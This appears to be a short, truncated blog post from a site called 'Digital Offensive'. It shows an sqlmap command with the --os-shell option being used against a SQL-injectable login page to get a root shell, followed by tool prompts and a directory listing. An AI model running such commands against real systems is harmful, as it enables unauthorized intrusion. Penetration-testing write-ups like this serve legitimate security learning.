Digital Offensive
Recently I was working with a basic SQLi flaw, and wanted to get OS-level access. Naturally, I turned to sqlmap’s “–os-shell” feature.
$ sqlmap -u 'http://targetserver.mytarget.city.nw/login.php' --data='user=josh&pass=pass' --os-shell sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org which web application language does the web server support? [1] ASP [2] ASPX [3] JSP [4] PHP (default) > [07:26:13] [WARNING] unable to retrieve automatically the web server document root what do you want to use for web server document root? [1] common location(s) '/var/www/' (default) [2] custom location [3] custom directo
root@targetserver:/var/www# ls -l total 48 -rw-r--r-- 1 root root 573 Jan 16 2013 alarms.php drwxr-xr-x 2 root root 4096 Jan 16 2013 css -rw-r--r-- 1 root root 634 Jan 16 2013 denied.php -rw-r--r-- 1 root root 304 Jan 16 2013 footer.php -rw-r--r-- 1 root root 3577 Dec 5 05:47 header.php drwxr-xr-x 2 root root 4096 Jan 16 2013 images -rw-r--r-- 1 root root 3516 Jan 16 2013 index.php drwxr-xr-x 2 root root 4096 Jan 16 2013 js -rw-r--r-- 1 root root 424 Dec 5 07:26 login.php -rw-r--r-- 1 root root 198 Jan 16 2
Digital Offensive